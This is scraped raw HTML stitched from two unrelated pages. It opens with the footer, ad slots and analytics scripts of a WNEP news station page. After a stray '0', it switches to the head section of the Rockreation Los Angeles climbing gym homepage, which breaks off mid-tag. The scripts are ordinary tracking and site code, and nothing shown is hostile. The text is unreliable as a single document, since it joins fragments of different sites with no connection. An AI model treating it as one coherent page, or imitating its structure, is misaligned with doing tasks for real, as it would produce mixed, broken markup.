Talkback">Talkback</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/talkback-16-dog-found-in-backpack-wood-mode-closing-the-forecast/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382227347.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/talkback-16-dog-found-in-backpack-wood-mode-closing-the-forecast/" rel="bookmark">Talkback 16: Dog Found in Backpack, Wood-Mode Closing, The&nbsp;Forecast</a></h4> </li> </ul> </div> <div class="ad ad-long full-width"> <div id='acm-tag-728x90-btf' class='prebid ad-wrapper' style='width:px; min-height: 90px;'><script> googletag.cmd.push(function() { googletag.display('acm-tag-728x90-btf'); });</script></div> </div> <footer role="contentinfo"> <div id="mobile-links" class="footer-block gray-links full-width"><ul id="menu-footer-app-links" class="nav nav-pills"><li class="nav-header">Mobile Apps</li><li id="menu-item-176317" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-176317"><a href="https://play.google.com/store/apps/details?id=com.wnep.localtv#?t=W251bGwsMSwxLDIxMiwiY29tLnduZXAubG9jYWx0diJd">Android App</a></li> <li id="menu-item-176318" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-176318"><a href="https://play.google.com/store/apps/details?id=com.wnep.android.weather&#038;hl=en">Android Weather App</a></li> <li id="menu-item-176321" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-176321"><a href="https://itunes.apple.com/us/app/wnep/id576449977?ls=1&#038;mt=8">iPhone &amp; iPad App</a></li> <li id="menu-item-176322" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-176322"><a href="http://itunes.apple.com/us/app/wnep-weather/id368497728?mt=8">iPhone Weather App</a></li> </ul></div> <div id="extra-links" class="footer-block gray-links full-width"> <div class="container"> <ul class="nav nav-pills"> <li> <a href="http://www.facebook.com/Newswatch16" target="_blank"> <i class="icon-facebook-sign icon-4x"></i>Facebook </a> </li> <li> <a href="http://twitter.com/wnep" target="_blank"> <i class="icon-twitter-sign icon-4x"></i>Twitter </a> </li> <li> <a href="http://instagram.com/wneptv/" target="_blank"> <i class="icon-instagram icon-4x"></i>Instagram </a> </li> <li> <a href="https://www.pinterest.com/wnep/" target="_blank"> <i class="icon-pinterest icon-4x"></i>Pinterest </a> </li> <li><a href="https://wnep.com/contact/"><i class="icon-info-sign icon-4x"></i>About &amp; Contact</a></li> <li><a href="http://www.covers.com/" target="_blank"> <svg xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50"><path d="M45.2677,18.196c-.33069-.00317-.65833-.00519-1.00037-.01257-11.60742-.25128-19.31073-6.1239-27.44861-3.028A10.30386,10.30386,0,0,0,9.83844,25.1073a10.30392,10.30392,0,0,0,6.98029,9.95178c8.13788,3.09595,15.84119-2.77667,27.44861-3.028.31714-.00684.62012-.00842.92749-.01172A21.37493,21.37493,0,0,0,45.2677,18.196Z" /><path d="M13.43243,42.79919c-.17108-.04321-.32788-.10162-.49567-.14844a21.37364,21.37364,0,0,0,30.01337-6.04266C31.94232,39.739,26.06372,45.99066,13.43243,42.79919Z" /><path d="M43.11938,13.656A21.36985,21.36985,0,0,0,12.45325,7.69324c.32062-.09973.646-.1936.97919-.27783C26.129,4.2074,32.00092,10.54169,43.11938,13.656Z"/><path d="M24.99988,0A25,25,0,1,0,50,25.00012,25.02837,25.02837,0,0,0,24.99988,0Zm0,48.192A23.192,23.192,0,1,1,48.192,25.00012,23.2182,23.2182,0,0,1,24.99988,48.192Z" /></svg>Covers</a> </li> </ul> </div> </div> <div id="small-print" class="footer-block full-width"> <div class="container"> <br> <p> <a target="_blank" href="https://publicfiles.fcc.gov/tv-profile/wnep-tv"> Online Public File </a> &bull; <a href="https://wnep.com/terms-of-service">Terms of Service</a> &bull; <a href="http://privacy.tribunemedia.com/">Privacy Policy</a> <br class="visible-phone"> &bull; 16 Montage Mountain Road, Moosic, PA 18507 <br class="visible-phone"> &bull; Copyright &copy; 2019, WNEP <br class="visible-phone"> &bull; <a href="http://tribunemedia.com/">A Dreamcatcher station operated by Tribune Broadcasting</a> &bull; Powered by <a href="https://wpvip.com/?utm_source=vip_powered_wpcom&#038;utm_medium=web&#038;utm_campaign=VIP%20Footer%20Credit&#038;utm_term=wnep.com" rel="generator nofollow" class="powered-by-wpcom">WordPress.com VIP</a> </p> </div> </div> </footer> <div id="email-alerts-modal" class="modal modal-small hide fade"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button> <h3>Email Alerts</h3> </div> <div class="modal-body"> <iframe class="iframe" id="subscribe_shortcode_iframe" width="100%" height="150" src="" frameborder="0" scrolling="no"></iframe> </div> </div> <!--[if IE]> <div class="ie-warning"> <strong>Notice</strong>: you are using an outdated browser. <a href="https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/The-perils-of-using-Internet-Explorer-as-your-default-browser/ba-p/331732" target="_blank">Microsoft does not recommend using IE as your default browser</a>. Some features on this website, like video and images, might not work properly. For the best experience, <a href="https://browsehappy.com/" target="_blank">please upgrade your browser</a>. </div> <![endif]--> <div class="ie-10-up hide"> <div class="ie-warning"> <strong>Notice</strong>: you are using an outdated browser. <a href="https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/The-perils-of-using-Internet-Explorer-as-your-default-browser/ba-p/331732" target="_blank">Microsoft does not recommend using IE as your default browser</a>. Some features on this website, like video and images, might not work properly. For the best experience, <a href="https://browsehappy.com/" target="_blank">please upgrade your browser</a>. </div> </div> <script type="text/javascript"> //<![CDATA[ var infiniteScroll = JSON.parse( decodeURIComponent( '%7B%22settings%22%3A%7B%22id%22%3A%22stories-infinite%22%2C%22ajaxurl%22%3A%22https%3A%5C%2F%5C%2Fwnep.com%5C%2F%3Finfinity%3Dscrolling%22%2C%22type%22%3A%22click%22%2C%22wrapper%22%3Afalse%2C%22wrapper_class%22%3A%22infinite-wrap%22%2C%22footer%22%3Afalse%2C%22click_handle%22%3A%221%22%2C%22text%22%3A%22Load%20More%20Stories%22%2C%22totop%22%3A%22Scroll%20back%20to%20top%22%2C%22currentday%22%3A%2213.05.19%22%2C%22order%22%3A%22DESC%22%2C%22scripts%22%3A%5B%5D%2C%22styles%22%3A%5B%5D%2C%22google_analytics%22%3Afalse%2C%22offset%22%3A0%2C%22history%22%3A%7B%22host%22%3A%22wnep.com%22%2C%22path%22%3A%22%5C%2Fpage%5C%2F%25d%5C%2F%22%2C%22use_trailing_slashes%22%3Atrue%2C%22parameters%22%3A%22%22%7D%2C%22query_args%22%3A%7B%22error%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A0%2C%22post_parent%22%3A%22%22%2C%22subpost%22%3A%22%22%2C%22subpost_id%22%3A%22%22%2C%22attachment%22%3A%22%22%2C%22attachment_id%22%3A0%2C%22name%22%3A%22%22%2C%22pagename%22%3A%22%22%2C%22page_id%22%3A0%2C%22second%22%3A%22%22%2C%22minute%22%3A%22%22%2C%22hour%22%3A%22%22%2C%22day%22%3A0%2C%22monthnum%22%3A0%2C%22year%22%3A0%2C%22w%22%3A0%2C%22category_name%22%3A%22%22%2C%22tag%22%3A%22%22%2C%22cat%22%3A%22%22%2C%22tag_id%22%3A%22%22%2C%22author%22%3A%22%22%2C%22author_name%22%3A%22%22%2C%22feed%22%3A%22%22%2C%22tb%22%3A%22%22%2C%22paged%22%3A0%2C%22meta_key%22%3A%22%22%2C%22meta_value%22%3A%22%22%2C%22preview%22%3A%22%22%2C%22s%22%3A%22%22%2C%22sentence%22%3A%22%22%2C%22title%22%3A%22%22%2C%22fields%22%3A%22%22%2C%22menu_order%22%3A%22%22%2C%22embed%22%3A%22%22%2C%22category__in%22%3A%5B%5D%2C%22category__not_in%22%3A%5B%5D%2C%22category__and%22%3A%5B%5D%2C%22post__in%22%3A%5B%5D%2C%22post__not_in%22%3A%5B652464%2C652383%2C652433%2C652420%2C652416%2C652230%2C652376%2C652310%2C652270%2C652323%2C652226%2C259891%2C647901%2C650955%2C648613%2C414080%2C527045%2C573464%2C141320%2C518063%2C85270%2C232953%2C587767%2C587761%2C587789%2C587758%2C587782%2C587756%2C587791%2C587763%2C587765%2C582588%2C589906%2C589903%2C589949%2C589404%2C589406%2C589420%2C589436%2C590000%2C589447%2C589429%2C589451%2C589453%2C589445%2C589409%2C590928%2C590926%2C590924%2C590922%2C590920%2C590913%2C590911%2C590908%2C590905%2C590902%2C590900%2C590898%2C590895%2C590893%2C590891%2C591805%2C591809%2C591811%2C591813%2C591815%2C591817%2C591819%2C591821%2C591823%2C591826%2C591828%2C591831%2C591833%2C591835%2C591837%2C591841%2C594749%2C594747%2C594745%2C594743%2C594756%2C594758%2C594760%2C594762%2C594767%2C594769%2C594771%2C594774%2C594776%2C595830%2C595832%2C595834%2C595836%2C595837%2C595839%2C595841%2C595843%2C595849%2C595851%2C595853%2C595857%2C595859%2C595861%2C421385%2C597459%2C589055%2C28616%2C599711%2C599705%2C600559%2C605935%2C597421%2C604502%2C606338%2C500415%2C626324%2C626317%2C626376%2C638878%2C642177%2C644325%5D%2C%22post_name__in%22%3A%5B%5D%2C%22tag__in%22%3A%5B%5D%2C%22tag__not_in%22%3A%5B%5D%2C%22tag__and%22%3A%5B%5D%2C%22tag_slug__in%22%3A%5B%5D%2C%22tag_slug__and%22%3A%5B%5D%2C%22post_parent__in%22%3A%5B%5D%2C%22post_parent__not_in%22%3A%5B%5D%2C%22author__in%22%3A%5B%5D%2C%22author__not_in%22%3A%5B%5D%2C%22posts_per_page%22%3A13%2C%22no_found_rows%22%3Atrue%2C%22orderby%22%3A%22modified%22%2C%22post_status%22%3A%22publish%22%2C%22ignore_sticky_posts%22%3Afalse%2C%22suppress_filters%22%3Afalse%2C%22cache_results%22%3Afalse%2C%22update_post_term_cache%22%3Atrue%2C%22lazy_load_term_meta%22%3Atrue%2C%22update_post_meta_cache%22%3Atrue%2C%22post_type%22%3A%22%22%2C%22nopaging%22%3Afalse%2C%22comments_per_page%22%3A%2230%22%2C%22order%22%3A%22DESC%22%7D%2C%22last_post_date%22%3A%222019-05-15%2017%3A08%3A06%22%2C%22stats%22%3A%22blog%3D29519678%26v%3Dwpcom%26tz%3D-4%26user_id%3D0%26subd%3Dlocaltvwnep%26x_pagetype%3Dinfinite-click%22%7D%7D' ) ); //]]> </script> <!-- wpcom_wp_footer --> <script> window._taboola = window._taboola || []; _taboola.push({ flush:true }); </script> <script> var _comscore = _comscore || []; _comscore.push( { c1: "2", c2: "18314522" } ); ( function() { var s = document.createElement( "script"), el = document.getElementsByTagName("script" )[0]; s.async = true; s.src = ( document.location.protocol == "https:" ? "https://sb" : "http://b" ) + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore( s, el ); })(); </script> <noscript> <img src="http://b.scorecardresearch.com/p?c1=2&c2=18314522&cv=2.0&cj=1" /> </noscript> <script type="text/javascript"> var _sf_async_config={}; _sf_async_config.uid = "15066"; _sf_async_config.domain = "wnep.com"; _sf_async_config.useCanonical = "true"; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', "\/\/static.chartbeat.com\/js\/chartbeat.js" ); document.body.appendChild(e); } var oldonload = window.onload; window.onload = (typeof window.onload != 'function') ? loadChartbeat : function() { try { oldonload(); } catch (e) { loadChartbeat(); throw e} loadChartbeat(); }; })(); </script> <script type="text/template" id="infowindow-template"> <% if ( featured_image_url !== '' ) { %> <a href="<%- permalink %>" target="_blank"> <img src="<%-featured_image_url%>?w=<%-imagesize%>&h=<%-imagesize%>&crop=1" style="float:right; margin:14px 0 10px 10px; height:<%-imagesize%>px; width:<%-imagesize%>px;"> </a> <% } %> <h5 style="margin-bottom:0;"><%=title%></h5> <em><%-date%></em> <p style="line-height:16px; font-weight:normal;"><%=excerpt%></p><a href="<%-permalink%>" class="text-small" target="_blank">Read more &rsaquo;</a> </script> <div id='acm-tag-oop' class='prebid ad-wrapper' > <script> googletag.cmd.push(function() { googletag.display('acm-tag-oop'); }); </script> </div> <script type='text/javascript'> /* <![CDATA[ */ var HighlanderComments = {"loggingInText":"Logging In\u2026","submittingText":"Posting Comment\u2026","postCommentText":"Post Comment","connectingToText":"Connecting to %s","commentingAsText":"%1$s: You are commenting using your %2$s account.","logoutText":"Log Out","loginText":"Log In","connectURL":"https:\/\/localtvwnep.wordpress.com\/public.api\/connect\/?action=request&domain=wnep.com","logoutURL":"https:\/\/localtvwnep.wordpress.com\/wp-login.php?action=logout&_wpnonce=b319ed9855","homeURL":"https:\/\/wnep.com\/","postID":"651572","gravDefault":"mystery","enterACommentError":"Please enter a comment","enterEmailError":"Please enter your email address here","invalidEmailError":"Invalid email address","enterAuthorError":"Please enter your name here","gravatarFromEmail":"This picture will show whenever you leave a comment. Click to customize it.","logInToExternalAccount":"Log in to use details from one of these accounts.","change":"Change","changeAccount":"Change Account","comment_registration":"1","userIsLoggedIn":"","isJetpack":"","text_direction":"ltr"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??/wp-content/js/jquery/jquery.autoresize.js,/wp-content/mu-plugins/highlander-comments/script.js?m=1551752381j'></script> <script> var cb = function() { if ( pbjs.initAdserverSet ) { googletag.cmd.push( function() { if ( ACMBatches.secondBatchTags.length ) { googletag.pubads().refresh( ACMBatches.secondBatchTags, { changeCorrelator: false } ); } }); clearInterval(adRefInterval) } }; var adRefInterval = setInterval( cb, 200 ); </script> <link rel='stylesheet' id='all-css-0-3' href='https://s2.wp.com/wp-content/mu-plugins/tiled-gallery/tiled-gallery.css?m=1443731146h&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJxtzMEOgjAQhOEXElYJPXgwPgu0q25pp9jthvj2esETt0n+L0Pb2vmCxmiUrVuTPQVKSRZWehsbvyaExLWPeqJjLHgIpH3+Y7cCnyz8jqKSIXBVXyr3WXAk5skvc8He7/l2cW4cz9dhcPELDe49rQ=='></script> <script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=20111117'></script> <script type='text/javascript'> /* <![CDATA[ */ var TrbTv = {"subscribeUrl":"http:\/\/cache.ltvcms.com\/wnep\/widgets\/homepagewidget.html","sharingEnabled":"","isArticle":"","isMobile":"","lazyCtx":"","lazyCtxMultiplier":"0.8"}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var wpcomVipAnalytics = {"is_404":"0","is_home":"1","is_single":"0","is_front_page":"1","is_archive":"0","percentToTrack":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??-eJydk1tSwzAMRTeE66HQT4a1KLbaOlUkYylJw+pxgZbnlIQ/y+NzJV1ZfswuCBuy+a53mfpdYvU2JjMsriEIhyaV6HJCzzhgQY6Jd6tWb/wSNv/O2R47VD+k7EkCkA1u7Vv1jYipFciukwi0HAtCBFlxOWkiZCn/A4RmLnT2KhbJUUbeS3V2KbwlPHbI/VKOEFgpxeUZ26cey7QaoNJgs729FAwcpkaO/+Wc7fuu0aX4CFOWxKarLvFc+D2Y+3yPlLHMLm3bc7Ak/AP4tEdrd8LaV9oBA02WwrUMl/nC8+RIIJ7g95GpMJQ/+v+VvwRXKoVYhV0DxXegdfXryZ0+dKl/TD/uFirUnQqHS7+JA/UnuVqTjltpWgz2XfEsN9TE4kEVTd8crHEuqNf8tkQY3Q6IqmFfo0o9dg+3m839+m5zu75vXwCdRvQc'></script> <script type="text/javascript"> // <![CDATA[ (function() { try{ if ( window.external &&'msIsSiteMode' in window.external) { if (window.external.msIsSiteMode()) { var jl = document.createElement('script'); jl.type='text/javascript'; jl.async=true; jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(jl, s); } } }catch(e){} })(); // ]]> </script><script type="text/javascript"> jQuery.extend( infiniteScroll.settings.scripts, ["jquery-core","jquery","postmessage","mobile-useragent-info","jquery_inview","jetpack_resize","acm-globals","r-login","ltv-throttle-debounce","srcmnt-ajax-request","spin","jquery.spin","jquery.autoresize","highlander-comments","jetpack_likes_queuehandler","the-neverending-homepage","underscore","backbone","twitter-widgets","twitter-widgets-infinity","twitter-widgets-pending","ltv-bootstrap-modal","ltv-bootstrap-collapse","ltv-bootstrap-tooltip","ltv-bootstrap-tab","ltv-dropdownhover","ltv-flexmenu","ltv-leanslider","ltv-jquery-validate","ltv-fancybox","ltv-fancybox-thumbs","ltv-waypoints","ltv-localtv","ltv-helpers","ltv-functions","wpcom-vip-analytics","jquery-sonar","wpcom-lazy-load-images","wpcom-masterbar-js","wpcom-masterbar-tracks-js","swfobject","videopress","tiled-gallery"] ); jQuery.extend( infiniteScroll.settings.styles, ["wp-block-library","wpcom-text-widget-styles","mp6hacks","ltv-bootstrap","ltv-responsive","ltv-icons-weather-icons","ltv-station","reblogging","h4-global","highlander-comments","highlander-comments-ie7","tiled-gallery"] ); </script><script> // Static Queue Snippet !function(t,n){t[n]=t[n]||{nlsQ:function(e,o,c,r,s,i){return s=t.document,r=s.createElement("script"),r.async=1,r.src=("http:"===t.location.protocol?"http:":"https:")+"//cdn-gl.imrworldwide.com/conf/"+e+".js#name="+o+"&ns="+n,i=s.getElementsByTagName("script")[0],i.parentNode.insertBefore(r,i),t[n][o]=t[n][o]||{g:c||{},ggPM:function(e,c,r,s,i){(t[n][o].q=t[n][o].q||[]).push([e,c,r,s,i])}},t[n][o]}}}(window,"NOLBUNDLE"); // SDK Initialization var nSdkInstance = NOLBUNDLE.nlsQ("PB491D12E-7061-4863-A98E-E138996F9801","nlsnInstance", {nol_sdkDebug: 0}); // Content Metadata var nielsenMetadata = { type: 'static', assetid: 0, // *DYNAMIC METADATA*: unique ID for each article **REQUIRED** section: "Page", // *DYNAMIC METADATA*: section of site **REQUIRED** segA: '', // *DYNAMIC METADATA*: custom segment segB: '', // *DYNAMIC METADATA*: custom segment segC: '' // *DYNAMIC METADATA*: custom segment }; // Event 'staticstart' Call nSdkInstance.ggPM("staticstart", nielsenMetadata); </script> <script src="//stats.wp.com/w.js?60" type="text/javascript" async defer></script> <script type="text/javascript"> _tkq = window._tkq || []; _stq = window._stq || []; _tkq.push(['storeContext', {'blog_id':'29519678','blog_tz':'-4','user_lang':'en','blog_lang':'en','user_id':'0'}]); _stq.push(['view', {'blog':'29519678','v':'wpcom','tz':'-4','user_id':'0','subd':'localtvwnep'}]); function st_vt() {var x=document.createElement("img");x.src="https://pixel.wp.com/g.gif?blog=29519678&v=wpcomvt&tz=-4&user_id=0&subd=localtvwnep&rand="+Math.random();} _stq.push(['extra', {'crypt':'UE40eW5QN0p8M2Y/RE1BNmNJfGhxNCVxUDExYmtib2E/SzdEJm0lUEtbdFU0fFk4cHZvcUFrZT90Tn4yQm1+R3NyNTdDSXAzMF1ST18/MkNCMnFKfkZOeTNscD18Nj1ULUFxTHBCNVdmTU0tcj9KLiUlcXx8bWdjal83Q0c/W34yWE9bSXVWcUZmRjB5cjR1cXl5SVhUeks4R2FdN3RVUFUraS1dNnQvckFYS1QtNCZda3FGQnErY0o5a0xoU09FNj0wT3RTZlNSUTdJMGhdOSU/YzM/dGIzQjU='}]); _stq.push([ 'clickTrackerInit', '29519678', '0' ]); </script> <noscript><img src="https://pixel.wp.com/b.gif?v=noscript" style="height:0px;width:0px;overflow:hidden" alt="" /></noscript> <script> if ( 'object' === typeof wpcom_mobile_user_agent_info ) { wpcom_mobile_user_agent_info.init(); var mobileStatsQueryString = ""; if( false !== wpcom_mobile_user_agent_info.matchedPlatformName ) mobileStatsQueryString += "&x_" + 'mobile_platforms' + '=' + wpcom_mobile_user_agent_info.matchedPlatformName; if( false !== wpcom_mobile_user_agent_info.matchedUserAgentName ) mobileStatsQueryString += "&x_" + 'mobile_devices' + '=' + wpcom_mobile_user_agent_info.matchedUserAgentName; if( wpcom_mobile_user_agent_info.isIPad() ) mobileStatsQueryString += "&x_" + 'ipad_views' + '=' + 'views'; if( "" != mobileStatsQueryString ) { new Image().src = document.location.protocol + '//pixel.wp.com/g.gif?v=wpcom-no-pv' + mobileStatsQueryString + '&baba=' + Math.random(); } } </script></body> </html> <!-- generated 247 seconds ago generated in 0.226 seconds served from batcache in 0.002 seconds expires in 53 seconds -->
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta name=viewport content="width=device-width,initial-scale=1,user-scalable=no"> <meta name="description" content="Auto Belay, bouldering, sport and lead climbing in Los Angeles, CA. Fitness, yoga, cross training, instruction, clinics, competitions + classes."> <meta name="keywords" content="rock climbing, fitness, los angeles, training, yoga, original, la climbing, fitness"> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://rockreation-la.com/xmlrpc.php" /> <link rel="shortcut icon" type="image/x-icon" href="https://rockreation-la.com/wp-content/uploads/2015/07/FAV-01.png"> <link rel="apple-touch-icon" href="https://rockreation-la.com/wp-content/uploads/2015/07/FAV-01.png"/> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <title>Rockreation Los Angeles | A Premiere Rock Climbing Gym</title> <link href='//fonts.googleapis.com/css?family=Open+Sans:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic%7COswald:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic%7CLato:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic%7COpen+Sans:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic%7COswald:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic%7CPT+Sans:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic%26subset%3Dlatin%2Clatin-ext' rel='stylesheet' type='text/css' /> <!-- Speed of this site is optimised by WP Performance Score Booster plugin v1.9.2.2 - https://dipakgajjar.com/wp-performance-score-booster/ --> <!-- All in One SEO Pack 2.12 by Michael Torbert of Semper Fi Web Design[940,991] --> <meta name="description" content="Whether you are brand new to the sport of climbing, or a well tested veteran, Rockreation Sport Climbing centers have something for you." /> <link rel="canonical" href="https://rockreation-la.com/" /> <!-- /all in one seo pack --> <link rel='dns-prefetch' href='//maps.googleapis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="ROCKREATION LA &raquo; Feed" href="https://rockreation-la.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="ROCKREATION LA &raquo; Comments Feed" href="https://rockreation-la.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="ROCKREATION LA &raquo; Home Comments Feed" href="https://rockreation-la.com/home-2/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/rockreation-la.com\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='contact-form-7-css' href='https://rockreation-la.com/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' /> <link rel='stylesheet' id='calendarizeit-css' href='https://rockreation-la.com/wp-content/plugins/calendarize-it/css/frontend.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='rhc-last-minue-css' href='https://rockreation-la.com/wp-content/plugins/calendarize-it/css/last_minute_fixes.css' type='text/css' media='all' /> <link rel='stylesheet' id='rhc-widgets-css' href='https://rockreation-la.com/wp-content/uploads/calendarize-it/calendarize-it-accordion-widget/rhc_widgets.css' type='text/css' media='all' /> <link rel='stylesheet' id='et-gf-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' /> <link rel='stylesheet' id='et_bloom-css-css' href='https://rockreation-la.com/wp-content/plugins/bloom/css/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_default_style-css' href='https://rockreation-la.com/wp-content/themes/vigor/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_stylesheet-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/stylesheet.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_style_dynamic-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/style_dynamic.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_font_awesome-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/font-awesome/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_font_elegant-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/elegant-icons/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_ion_icons-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/ion-icons/css/ionicons.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_linea_icons-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/linea-icons/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_responsive-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/responsive.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_style_dynamic_responsive-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/style_dynamic_responsive.css' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='https://rockreation-la.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_custom_css-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/custom_css.css' type='text/css' media='all' /> <link rel='stylesheet' id='edgt_webkit-css' href='https://rockreation-la.com/wp-content/themes/vigor/css/webkit_stylesheet.css' type='text/css' media='all' /> <link rel='stylesheet' id='rhc-print-css-css' 